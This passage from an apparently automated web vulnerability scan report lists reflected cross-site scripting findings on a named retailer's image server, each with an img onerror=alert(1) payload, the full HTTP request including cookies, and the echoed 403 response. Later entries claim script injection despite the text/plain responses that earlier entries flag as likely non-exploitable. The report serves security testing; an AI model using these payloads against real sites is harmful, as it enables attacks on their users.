Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/7914112_01_10896dcd<img src=a onerror=alert(1)>49fb4dde708

3.127. http://images3.pacsun.com/is/image/pacsunproducts/7954720M_01_010 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7954720M_01_010

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 6707c<img%20src%3da%20onerror%3dalert(1)>38418db140 was submitted in REST URL parameter 4 and was echoed as 6707c<img src=a onerror=alert(1)>38418db140 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/7954720M_01_0106707c<img%20src%3da%20onerror%3dalert(1)>38418db140?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/7954720M_01_0106707c<img src=a onerror=alert(1)>38418db140

3.128. http://images3.pacsun.com/is/image/pacsunproducts/7982143_01_004 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7982143_01_004

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 1e178<img%20src%3da%20onerror%3dalert(1)>49f933ea5e7 was submitted in REST URL parameter 4 and was echoed as 1e178<img src=a onerror=alert(1)>49f933ea5e7 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/7982143_01_0041e178<img%20src%3da%20onerror%3dalert(1)>49f933ea5e7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/7982143_01_0041e178<img src=a onerror=alert(1)>49f933ea5e7

3.129. http://images3.pacsun.com/is/image/pacsunproducts/8020984_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8020984_01

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 2106e<img%20src%3da%20onerror%3dalert(1)>e3a1d7ad873 was submitted in REST URL parameter 4 and was echoed as 2106e<img src=a onerror=alert(1)>e3a1d7ad873 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/8020984_012106e<img%20src%3da%20onerror%3dalert(1)>e3a1d7ad873?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/8020984_012106e<img src=a onerror=alert(1)>e3a1d7ad873

3.130. http://images3.pacsun.com/is/image/pacsunproducts/8078040_01_047 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8078040_01_047

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 4ed90<img%20src%3da%20onerror%3dalert(1)>99806ff0896 was submitted in REST URL parameter 4 and was echoed as 4ed90<img src=a onerror=alert(1)>99806ff0896 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/8078040_01_0474ed90<img%20src%3da%20onerror%3dalert(1)>99806ff0896?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:06 GMT
Connection: close

Unable to find /pacsunproducts/8078040_01_0474ed90<img src=a onerror=alert(1)>99806ff0896

3.131. http://images3.pacsun.com/is/image/pacsunproducts/8160301_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8160301_01

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload f58d7<img%20src%3da%20onerror%3dalert(1)>7d70f72ae03 was submitted in REST URL parameter 4 and was echoed as f58d7<img src=a onerror=alert(1)>7d70f72ae03 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/8160301_01f58d7<img%20src%3da%20onerror%3dalert(1)>7d70f72ae03?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8160301_01f58d7<img src=a onerror=alert(1)>7d70f72ae03

3.132. http://images3.pacsun.com/is/image/pacsunproducts/8170284_01_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8170284_01_001

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload f4718<img%20src%3da%20onerror%3dalert(1)>bea69b6fa7f was submitted in REST URL parameter 4 and was echoed as f4718<img src=a onerror=alert(1)>bea69b6fa7f in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/8170284_01_001f4718<img%20src%3da%20onerror%3dalert(1)>bea69b6fa7f?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:43 GMT
Connection: close

Unable to find /pacsunproducts/8170284_01_001f4718<img src=a onerror=alert(1)>bea69b6fa7f

3.133. http://images3.pacsun.com/is/image/pacsunproducts/8170284_sw_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8170284_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bd500<img%20src%3da%20onerror%3dalert(1)>63f1c2b1e91 was submitted in the REST URL parameter 4. This input was echoed as bd500<img src=a onerror=alert(1)>63f1c2b1e91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8170284_sw_001bd500<img%20src%3da%20onerror%3dalert(1)>63f1c2b1e91?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8170284_sw_001bd500<img src=a onerror=alert(1)>63f1c2b1e91

3.134. http://images3.pacsun.com/is/image/pacsunproducts/8170284_sw_014 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8170284_sw_014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c2c8e<img%20src%3da%20onerror%3dalert(1)>48fe2b1cfa8 was submitted in the REST URL parameter 4. This input was echoed as c2c8e<img src=a onerror=alert(1)>48fe2b1cfa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8170284_sw_014c2c8e<img%20src%3da%20onerror%3dalert(1)>48fe2b1cfa8?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:41 GMT
Connection: close

Unable to find /pacsunproducts/8170284_sw_014c2c8e<img src=a onerror=alert(1)>48fe2b1cfa8

3.135. http://images3.pacsun.com/is/image/pacsunproducts/8173775_01_080 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8173775_01_080

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8212<img%20src%3da%20onerror%3dalert(1)>0c3e014616a was submitted in the REST URL parameter 4. This input was echoed as a8212<img src=a onerror=alert(1)>0c3e014616a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8173775_01_080a8212<img%20src%3da%20onerror%3dalert(1)>0c3e014616a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:08 GMT
Connection: close

Unable to find /pacsunproducts/8173775_01_080a8212<img src=a onerror=alert(1)>0c3e014616a

3.136. http://images3.pacsun.com/is/image/pacsunproducts/8173775_sw_041 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8173775_sw_041

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29dbe<img%20src%3da%20onerror%3dalert(1)>537d4a97d74 was submitted in the REST URL parameter 4. This input was echoed as 29dbe<img src=a onerror=alert(1)>537d4a97d74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8173775_sw_04129dbe<img%20src%3da%20onerror%3dalert(1)>537d4a97d74?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:09 GMT
Connection: close

Unable to find /pacsunproducts/8173775_sw_04129dbe<img src=a onerror=alert(1)>537d4a97d74

3.137. http://images3.pacsun.com/is/image/pacsunproducts/8173775_sw_080 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8173775_sw_080

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b4ba<img%20src%3da%20onerror%3dalert(1)>151550698b2 was submitted in the REST URL parameter 4. This input was echoed as 9b4ba<img src=a onerror=alert(1)>151550698b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8173775_sw_0809b4ba<img%20src%3da%20onerror%3dalert(1)>151550698b2?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/8173775_sw_0809b4ba<img src=a onerror=alert(1)>151550698b2

3.138. http://images3.pacsun.com/is/image/pacsunproducts/8177750_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8177750_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3b1e3<img%20src%3da%20onerror%3dalert(1)>4fa5924f20c was submitted in the REST URL parameter 4. This input was echoed as 3b1e3<img src=a onerror=alert(1)>4fa5924f20c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8177750_013b1e3<img%20src%3da%20onerror%3dalert(1)>4fa5924f20c?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
